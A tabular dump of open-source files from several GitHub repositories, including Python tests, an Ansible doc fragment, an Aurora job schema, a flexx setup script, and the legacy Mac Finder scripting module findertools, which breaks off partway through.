repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
kmonsoor/python-for-android | python3-alpha/python3-src/Lib/test/test_osx_env.py | 59 | 1341 | """
Test suite for OS X interpreter environment variables.
"""
from test.support import EnvironmentVarGuard, run_unittest
import subprocess
import sys
import unittest
class OSXEnvironmentVariableTestCase(unittest.TestCase):
def _check_sys(self, ev, cond, sv, val = sys.executable + 'dummy'):
with EnvironmentVarGuard() as evg:
subpc = [str(sys.executable), '-c',
'import sys; sys.exit(2 if "%s" %s %s else 3)' % (val, cond, sv)]
# ensure environment variable does not exist
evg.unset(ev)
            # test that the test on sys.xxx normally fails
rc = subprocess.call(subpc)
self.assertEqual(rc, 3, "expected %s not %s %s" % (ev, cond, sv))
# set environ variable
evg.set(ev, val)
# test that sys.xxx has been influenced by the environ value
rc = subprocess.call(subpc)
self.assertEqual(rc, 2, "expected %s %s %s" % (ev, cond, sv))
def test_pythonexecutable_sets_sys_executable(self):
self._check_sys('PYTHONEXECUTABLE', '==', 'sys.executable')
def test_main():
from distutils import sysconfig
if sys.platform == 'darwin' and sysconfig.get_config_var('WITH_NEXT_FRAMEWORK'):
run_unittest(OSXEnvironmentVariableTestCase)
if __name__ == "__main__":
test_main()
| apache-2.0 |
alexlo03/ansible | lib/ansible/utils/module_docs_fragments/cnos.py | 25 | 3793 | # Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
class ModuleDocFragment(object):
# Standard CNOS documentation fragment
DOCUMENTATION = '''
options:
outputfile:
description:
- This specifies the file path where the output of each command
execution is saved. Each command that is specified in the merged
template file and each response from the device are saved here.
Usually the location is the results folder, but you can
choose another location based on your write permission.
required: true
version_added: 2.3
host:
description:
- This is the variable used to search the hosts file at
/etc/ansible/hosts and identify the IP address of the device on
which the template is going to be applied. Usually the Ansible
keyword {{ inventory_hostname }} is specified in the playbook as
an abstraction of the group of network elements that need to be
configured.
required: true
version_added: 2.3
username:
description:
- Configures the username used to authenticate the connection to
the remote device. The value of the username parameter is used to
authenticate the SSH session. While generally the value should
come from the inventory file, you can also specify it as a
variable. This parameter is optional. If it is not specified, no
default value will be used.
required: true
version_added: 2.3
password:
description:
- Configures the password used to authenticate the connection to
the remote device. The value of the password parameter is used to
authenticate the SSH session. While generally the value should
come from the inventory file, you can also specify it as a
variable. This parameter is optional. If it is not specified, no
default value will be used.
required: true
version_added: 2.3
enablePassword:
description:
- Configures the password used to enter Global Configuration
command mode on the switch. If the switch does not request this
        password, the parameter is ignored. While generally the value
should come from the inventory file, you can also specify it as a
variable. This parameter is optional. If it is not specified,
no default value will be used.
version_added: 2.3
deviceType:
description:
- This specifies the type of device where the method is executed.
        The choices NE1072T, NE1032, NE1032T, NE10032 and NE2572 were
        added in version 2.4. The choice NE0152T was added in version 2.8.
    required: true
choices: [g8272_cnos,g8296_cnos,g8332_cnos,NE1072T,NE1032,
NE1032T,NE10032,NE2572,NE0152T]
version_added: 2.3
notes:
- For more information on using Ansible to manage Lenovo Network devices see U(https://www.ansible.com/ansible-lenovo).
'''
| gpl-3.0 |
PacktPublishing/Mastering-Mesos | Chapter4/Aurora/src/main/python/apache/aurora/config/schema/base.py | 2 | 5083 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Disable checkstyle for this entire file as it is a pystachio schema.
# checkstyle: noqa
from apache.thermos.config.schema import *
# TODO(wickman) Bind {{mesos.instance}} to %shard_id%
class MesosContext(Struct):
# The instance id (i.e. replica id, shard id) in the context of a task
instance = Required(Integer)
hostname = Required(String)
class UpdateConfig(Struct):
batch_size = Default(Integer, 1)
watch_secs = Default(Integer, 45)
max_per_shard_failures = Default(Integer, 0)
max_total_failures = Default(Integer, 0)
rollback_on_failure = Default(Boolean, True)
wait_for_batch_completion = Default(Boolean, False)
pulse_interval_secs = Integer
class HttpHealthChecker(Struct):
endpoint = Default(String, '/health')
expected_response = Default(String, 'ok')
expected_response_code = Default(Integer, 0)
class ShellHealthChecker(Struct):
shell_command = Required(String)
class HealthCheckerConfig(Struct):
http = HttpHealthChecker
shell = ShellHealthChecker
DefaultHealthChecker = HealthCheckerConfig(http=HttpHealthChecker())
class HealthCheckConfig(Struct):
health_checker = Default(HealthCheckerConfig, DefaultHealthChecker)
initial_interval_secs = Default(Float, 15.0)
interval_secs = Default(Float, 10.0)
max_consecutive_failures = Default(Integer, 0)
timeout_secs = Default(Float, 1.0)
class HttpLifecycleConfig(Struct):
# Named port to POST shutdown endpoints
port = Default(String, 'health')
# Endpoint to hit to indicate that a task should gracefully shutdown.
graceful_shutdown_endpoint = Default(String, '/quitquitquit')
  # Endpoint to hit to give a task its final warning before being killed.
shutdown_endpoint = Default(String, '/abortabortabort')
class LifecycleConfig(Struct):
http = HttpLifecycleConfig
DisableLifecycle = LifecycleConfig()
DefaultLifecycleConfig = LifecycleConfig(http = HttpLifecycleConfig())
class Announcer(Struct):
primary_port = Default(String, 'http')
# Portmap can either alias two ports together, e.g.
# aurora <= http
# Or it can be used to alias static ports to endpoints, e.g.
# http <= 80
# https <= 443
# aurora <= https
portmap = Default(Map(String, String), {
'aurora': '{{primary_port}}'
})
  # Root of tree where announcements are stored. If specified, this overrides the
# default path (executor must be started with --announcer-allow-custom-serverset-path for
# this setting to take effect)
zk_path = String
# The executorConfig populated inside of TaskConfig.
class MesosTaskInstance(Struct):
task = Required(Task)
instance = Required(Integer)
role = Required(String)
announce = Announcer
environment = Required(String)
health_check_config = Default(HealthCheckConfig, HealthCheckConfig())
lifecycle = LifecycleConfig
class Parameter(Struct):
name = Required(String)
value = Required(String)
class Docker(Struct):
image = Required(String)
parameters = Default(List(Parameter), [])
class Container(Struct):
docker = Docker
class MesosJob(Struct):
name = Default(String, '{{task.name}}')
role = Required(String)
contact = String
cluster = Required(String)
environment = Required(String)
instances = Default(Integer, 1)
task = Required(Task)
announce = Announcer
tier = String
cron_schedule = String
cron_collision_policy = Default(String, "KILL_EXISTING")
update_config = Default(UpdateConfig, UpdateConfig())
constraints = Map(String, String)
service = Default(Boolean, False)
max_task_failures = Default(Integer, 1)
production = Default(Boolean, False)
priority = Default(Integer, 0)
health_check_config = Default(HealthCheckConfig, HealthCheckConfig())
# TODO(wickman) Make Default(Any, LifecycleConfig()) once pystachio #17 is addressed.
lifecycle = Default(LifecycleConfig, DefaultLifecycleConfig)
task_links = Map(String, String) # Unsupported. See AURORA-739
enable_hooks = Default(Boolean, False) # enable client API hooks; from env python-list 'hooks'
container = Container
Job = MesosJob
Service = Job(service = True)
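# A minimal usage sketch (all values hypothetical, not part of this schema):
# composing a Service from the structs above, assuming Process, Task and
# Resources come in through the apache.thermos.config.schema star import.
#
#   hello = Process(name='hello', cmdline='echo hello && sleep 60')
#   hello_task = Task(processes=[hello],
#                     resources=Resources(cpu=1, ram=128*MB, disk=128*MB))
#   hello_svc = Service(cluster='devcluster', environment='devel',
#                       role='www-data', name='hello', task=hello_task)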
| mit |
lukw00/spaCy | tests/munge/test_align.py | 5 | 1085 | from spacy.util import align_tokens
def test_perfect_align():
ref = ['I', 'align', 'perfectly']
indices = []
i = 0
for token in ref:
indices.append((i, i + len(token)))
i += len(token)
aligned = list(align_tokens(ref, indices))
assert aligned[0] == ('I', [(0, 1)])
assert aligned[1] == ('align', [(1, 6)])
assert aligned[2] == ('perfectly', [(6, 15)])
def test_hyphen_align():
ref = ['I', 'must', 're-align']
indices = [(0, 1), (1, 5), (5, 7), (7, 8), (8, 13)]
aligned = list(align_tokens(ref, indices))
assert aligned[0] == ('I', [(0, 1)])
assert aligned[1] == ('must', [(1, 5)])
assert aligned[2] == ('re-align', [(5, 7), (7, 8), (8, 13)])
def test_align_continue():
ref = ['I', 'must', 're-align', 'and', 'continue']
indices = [(0, 1), (1, 5), (5, 7), (7, 8), (8, 13), (13, 16), (16, 24)]
aligned = list(align_tokens(ref, indices))
assert aligned[2] == ('re-align', [(5, 7), (7, 8), (8, 13)])
assert aligned[3] == ('and', [(13, 16)])
assert aligned[4] == ('continue', [(16, 24)])
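def _align_tokens_sketch(tokens, candidates):
    # Hypothetical reference implementation (not spaCy's actual align_tokens):
    # greedily consume candidate (start, end) spans until their combined
    # length covers each token, yielding (token, spans) pairs as asserted above.
    candidates = iter(candidates)
    for token in tokens:
        spans = []
        covered = 0
        while covered < len(token):
            start, end = next(candidates)
            spans.append((start, end))
            covered += end - start
        yield token, spans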
| mit |
thezawad/flexx | setup.py | 17 | 2416 | # -*- coding: utf-8 -*-
""" Flexx setup script.
Release:
* python setup.py register
* python setup.py sdist bdist_wheel --universal upload
* build conda packages?
"""
import os
from os import path as op
try:
# use setuptools namespace, allows for "develop"
import setuptools # noqa, analysis:ignore
except ImportError:
pass # it's not essential for installation
from distutils.core import setup
name = 'flexx'
description = "Pure Python toolkit for creating GUI's using web technology."
# Get version and docstring
__version__ = None
__doc__ = ''
docStatus = 0 # Not started, in progress, done
initFile = os.path.join(os.path.dirname(__file__), name, '__init__.py')
for line in open(initFile).readlines():
if (line.startswith('version_info') or line.startswith('__version__')):
exec(line.strip())
elif line.startswith('"""'):
if docStatus == 0:
docStatus = 1
line = line.lstrip('"')
elif docStatus == 1:
docStatus = 2
if docStatus == 1:
__doc__ += line
def package_tree(pkgroot):
path = os.path.dirname(__file__)
subdirs = [os.path.relpath(i[0], path).replace(os.path.sep, '.')
for i in os.walk(os.path.join(path, pkgroot))
if '__init__.py' in i[2]]
return subdirs
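# For example (hypothetical layout): with packages at flexx/, flexx/ui/ and
# flexx/util/, package_tree('flexx') returns
# ['flexx', 'flexx.ui', 'flexx.util'].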
setup(
name=name,
version=__version__,
author='Flexx contributors',
author_email='almar.klein@gmail.com',
license='(new) BSD',
url='http://flexx.readthedocs.org',
download_url='https://pypi.python.org/pypi/flexx',
keywords="ui design, web runtime, pyscript, reactive programming, FRP",
description=description,
long_description=__doc__,
platforms='any',
provides=[name],
install_requires=[],
packages=package_tree(name),
package_dir={name: name},
package_data={},
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
#'Programming Language :: Python :: 2.7', # not yet supported
'Programming Language :: Python :: 3.4',
],
)
| bsd-2-clause |
CamelBackNotation/CarnotKE | jyhton/lib-python/2.7/plat-mac/findertools.py | 29 | 30176 | """Utility routines depending on the finder,
a combination of code by Jack Jansen and erik@letterror.com.
Most events have been captured from
Lasso Capture AE and then translated to Python code.
IMPORTANT
Note that the processes() function returns different values
depending on the OS version it is running on. On MacOS 9
the Finder returns the process *names* which can then be
used to find out more about them. On MacOS 8.6 and earlier
the Finder returns a code which does not seem to work.
So bottom line: the processes() stuff does not work on < MacOS9
Mostly written by erik@letterror.com
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the findertools module is removed.", stacklevel=2)
import Finder
from Carbon import AppleEvents
import aetools
import MacOS
import sys
import Carbon.File
import Carbon.Folder
import aetypes
from types import *
__version__ = '1.1'
Error = 'findertools.Error'
_finder_talker = None
def _getfinder():
"""returns basic (recyclable) Finder AE interface object"""
global _finder_talker
if not _finder_talker:
_finder_talker = Finder.Finder()
_finder_talker.send_flags = ( _finder_talker.send_flags |
AppleEvents.kAECanInteract | AppleEvents.kAECanSwitchLayer)
return _finder_talker
def launch(file):
"""Open a file thru the finder. Specify file by name or fsspec"""
finder = _getfinder()
fss = Carbon.File.FSSpec(file)
return finder.open(fss)
def Print(file):
"""Print a file thru the finder. Specify file by name or fsspec"""
finder = _getfinder()
fss = Carbon.File.FSSpec(file)
return finder._print(fss)
def copy(src, dstdir):
"""Copy a file to a folder"""
finder = _getfinder()
if type(src) == type([]):
src_fss = []
for s in src:
src_fss.append(Carbon.File.FSSpec(s))
else:
src_fss = Carbon.File.FSSpec(src)
dst_fss = Carbon.File.FSSpec(dstdir)
return finder.duplicate(src_fss, to=dst_fss)
def move(src, dstdir):
"""Move a file to a folder"""
finder = _getfinder()
if type(src) == type([]):
src_fss = []
for s in src:
src_fss.append(Carbon.File.FSSpec(s))
else:
src_fss = Carbon.File.FSSpec(src)
dst_fss = Carbon.File.FSSpec(dstdir)
return finder.move(src_fss, to=dst_fss)
def sleep():
"""Put the mac to sleep"""
finder = _getfinder()
finder.sleep()
def shutdown():
"""Shut the mac down"""
finder = _getfinder()
finder.shut_down()
def restart():
"""Restart the mac"""
finder = _getfinder()
finder.restart()
#---------------------------------------------------
# Additional findertools
#
def reveal(file):
"""Reveal a file in the finder. Specify file by name, fsref or fsspec."""
finder = _getfinder()
fsr = Carbon.File.FSRef(file)
file_alias = fsr.FSNewAliasMinimal()
return finder.reveal(file_alias)
def select(file):
"""select a file in the finder. Specify file by name, fsref or fsspec."""
finder = _getfinder()
fsr = Carbon.File.FSRef(file)
file_alias = fsr.FSNewAliasMinimal()
return finder.select(file_alias)
def update(file):
"""Update the display of the specified object(s) to match
their on-disk representation. Specify file by name, fsref or fsspec."""
finder = _getfinder()
fsr = Carbon.File.FSRef(file)
file_alias = fsr.FSNewAliasMinimal()
return finder.update(file_alias)
#---------------------------------------------------
# More findertools
#
def comment(object, comment=None):
"""comment: get or set the Finder-comment of the item, displayed in the 'Get Info' window."""
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
if comment is None:
return _getcomment(object_alias)
else:
return _setcomment(object_alias, comment)
def _setcomment(object_alias, comment):
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('comt'), fr=aeobj_00)
args['----'] = aeobj_01
args["data"] = comment
_reply, args, attrs = finder.send("core", "setd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _getcomment(object_alias):
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('comt'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
#---------------------------------------------------
# Get information about current processes in the Finder.
def processes():
"""processes returns a list of all active processes running on this computer and their creators."""
finder = _getfinder()
args = {}
attrs = {}
processnames = []
processnumbers = []
creators = []
partitions = []
used = []
## get the processnames or else the processnumbers
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prcs'), form="indx", seld=aetypes.Unknown('abso', "all "), fr=None)
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
p = []
if '----' in args:
p = args['----']
for proc in p:
if hasattr(proc, 'seld'):
# it has a real name
processnames.append(proc.seld)
elif hasattr(proc, 'type'):
if proc.type == "psn ":
# it has a process number
processnumbers.append(proc.data)
## get the creators
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('prcs'), form="indx", seld=aetypes.Unknown('abso', "all "), fr=None)
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('fcrt'), fr=aeobj_0)
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
        raise Error, aetools.decodeerror(args)
if '----' in args:
p = args['----']
creators = p[:]
## concatenate in one dict
result = []
if len(processnames) > len(processnumbers):
data = processnames
else:
data = processnumbers
for i in range(len(creators)):
result.append((data[i], creators[i]))
return result
class _process:
pass
def isactiveprocess(processname):
"""Check of processname is active. MacOS9"""
all = processes()
for n, c in all:
if n == processname:
return 1
return 0
def processinfo(processname):
"""Return an object with all process properties as attributes for processname. MacOS9"""
p = _process()
if processname == "Finder":
p.partition = None
p.used = None
else:
p.partition = _processproperty(processname, 'appt')
p.used = _processproperty(processname, 'pusd')
p.visible = _processproperty(processname, 'pvis') #Is the process' layer visible?
p.frontmost = _processproperty(processname, 'pisf') #Is the process the frontmost process?
p.file = _processproperty(processname, 'file') #the file from which the process was launched
p.filetype = _processproperty(processname, 'asty') #the OSType of the file type of the process
p.creatortype = _processproperty(processname, 'fcrt') #the OSType of the creator of the process (the signature)
p.accepthighlevel = _processproperty(processname, 'revt') #Is the process high-level event aware (accepts open application, open document, print document, and quit)?
p.hasscripting = _processproperty(processname, 'hscr') #Does the process have a scripting terminology, i.e., can it be scripted?
return p
def _processproperty(processname, property):
"""return the partition size and memory used for processname"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('prcs'), form="name", seld=processname, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type(property), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
#---------------------------------------------------
# Mess around with Finder windows.
def openwindow(object):
"""Open a Finder window for object, Specify object by name or fsspec."""
finder = _getfinder()
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
args = {}
attrs = {}
_code = 'aevt'
_subcode = 'odoc'
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
args['----'] = aeobj_0
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
def closewindow(object):
"""Close a Finder window for folder, Specify by path."""
finder = _getfinder()
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
args = {}
attrs = {}
_code = 'core'
_subcode = 'clos'
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
args['----'] = aeobj_0
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
def location(object, pos=None):
"""Set the position of a Finder window for folder to pos=(w, h). Specify file by name or fsspec.
If pos=None, location will return the current position of the object."""
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
if not pos:
return _getlocation(object_alias)
return _setlocation(object_alias, pos)
def _setlocation(object_alias, (x, y)):
"""_setlocation: Set the location of the icon for the object."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('posn'), fr=aeobj_00)
args['----'] = aeobj_01
args["data"] = [x, y]
_reply, args, attrs = finder.send("core", "setd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
return (x,y)
def _getlocation(object_alias):
"""_getlocation: get the location of the icon for the object."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('posn'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
pos = args['----']
return pos.h, pos.v
def label(object, index=None):
"""label: set or get the label of the item. Specify file by name or fsspec."""
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
if index is None:
return _getlabel(object_alias)
if index < 0 or index > 7:
index = 0
return _setlabel(object_alias, index)
def _getlabel(object_alias):
"""label: Get the label for the object."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('labi'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _setlabel(object_alias, index):
"""label: Set the label for the object."""
finder = _getfinder()
args = {}
attrs = {}
_code = 'core'
_subcode = 'setd'
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="alis", seld=object_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('labi'), fr=aeobj_0)
args['----'] = aeobj_1
args["data"] = index
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
return index
def windowview(folder, view=None):
"""windowview: Set the view of the window for the folder. Specify file by name or fsspec.
0 = by icon (default)
1 = by name
2 = by button
"""
fsr = Carbon.File.FSRef(folder)
folder_alias = fsr.FSNewAliasMinimal()
if view is None:
return _getwindowview(folder_alias)
return _setwindowview(folder_alias, view)
def _setwindowview(folder_alias, view=0):
"""set the windowview"""
attrs = {}
args = {}
if view == 1:
_v = aetypes.Type('pnam')
elif view == 2:
_v = aetypes.Type('lgbu')
else:
_v = aetypes.Type('iimg')
finder = _getfinder()
aeobj_0 = aetypes.ObjectSpecifier(want = aetypes.Type('cfol'),
form = 'alis', seld = folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want = aetypes.Type('prop'),
form = 'prop', seld = aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want = aetypes.Type('prop'),
form = 'prop', seld = aetypes.Type('pvew'), fr=aeobj_1)
aeobj_3 = aetypes.ObjectSpecifier(want = aetypes.Type('prop'),
form = 'prop', seld = _v, fr=None)
_code = 'core'
_subcode = 'setd'
args['----'] = aeobj_2
args['data'] = aeobj_3
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _getwindowview(folder_alias):
"""get the windowview"""
attrs = {}
args = {}
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=folder_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_00)
aeobj_02 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('pvew'), fr=aeobj_01)
args['----'] = aeobj_02
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
views = {'iimg':0, 'pnam':1, 'lgbu':2}
if '----' in args:
return views[args['----'].enum]
def windowsize(folder, size=None):
"""Set the size of a Finder window for folder to size=(w, h), Specify by path.
If size=None, windowsize will return the current size of the window.
Specify file by name or fsspec.
"""
fsr = Carbon.File.FSRef(folder)
folder_alias = fsr.FSNewAliasMinimal()
openwindow(fsr)
if not size:
return _getwindowsize(folder_alias)
return _setwindowsize(folder_alias, size)
def _setwindowsize(folder_alias, (w, h)):
"""Set the size of a Finder window for folder to (w, h)"""
finder = _getfinder()
args = {}
attrs = {}
_code = 'core'
_subcode = 'setd'
aevar00 = [w, h]
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('ptsz'), fr=aeobj_1)
args['----'] = aeobj_2
args["data"] = aevar00
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
return (w, h)
def _getwindowsize(folder_alias):
"""Set the size of a Finder window for folder to (w, h)"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('posn'), fr=aeobj_1)
args['----'] = aeobj_2
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def windowposition(folder, pos=None):
"""Set the position of a Finder window for folder to pos=(w, h)."""
fsr = Carbon.File.FSRef(folder)
folder_alias = fsr.FSNewAliasMinimal()
openwindow(fsr)
if not pos:
return _getwindowposition(folder_alias)
if type(pos) == InstanceType:
# pos might be a QDPoint object as returned by _getwindowposition
pos = (pos.h, pos.v)
return _setwindowposition(folder_alias, pos)
def _setwindowposition(folder_alias, (x, y)):
"""Set the size of a Finder window for folder to (w, h)."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('posn'), fr=aeobj_1)
args['----'] = aeobj_2
args["data"] = [x, y]
_reply, args, attrs = finder.send('core', 'setd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _getwindowposition(folder_alias):
"""Get the size of a Finder window for folder, Specify by path."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('ptsz'), fr=aeobj_1)
args['----'] = aeobj_2
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def icon(object, icondata=None):
"""icon sets the icon of object, if no icondata is given,
icon will return an AE object with binary data for the current icon.
If left untouched, this data can be used to paste the icon on another file.
Development opportunity: get and set the data as PICT."""
fsr = Carbon.File.FSRef(object)
object_alias = fsr.FSNewAliasMinimal()
if icondata is None:
return _geticon(object_alias)
return _seticon(object_alias, icondata)
def _geticon(object_alias):
"""get the icondata for object. Binary data of some sort."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'),
form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('iimg'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _seticon(object_alias, icondata):
"""set the icondata for object, formatted as produced by _geticon()"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'),
form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('iimg'), fr=aeobj_00)
args['----'] = aeobj_01
args["data"] = icondata
_reply, args, attrs = finder.send("core", "setd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----'].data
#---------------------------------------------------
# Volumes and servers.
def mountvolume(volume, server=None, username=None, password=None):
"""mount a volume, local or on a server on AppleTalk.
    Note: mounting an ASIP server requires a different operation.
server is the name of the server where the volume belongs
username, password belong to a registered user of the volume."""
finder = _getfinder()
args = {}
attrs = {}
if password:
args["PASS"] = password
if username:
args["USER"] = username
if server:
args["SRVR"] = server
args['----'] = volume
_reply, args, attrs = finder.send("aevt", "mvol", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
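# Usage sketch (all names hypothetical):
#   mountvolume('Projects', server='Fileserver', username='erik',
#               password='secret')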
def unmountvolume(volume):
"""unmount a volume that's on the desktop"""
putaway(volume)
def putaway(object):
"""puth the object away, whereever it came from."""
finder = _getfinder()
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('cdis'), form="name", seld=object, fr=None)
    _reply, args, attrs = finder.send("fndr", "ptwy", args, attrs)
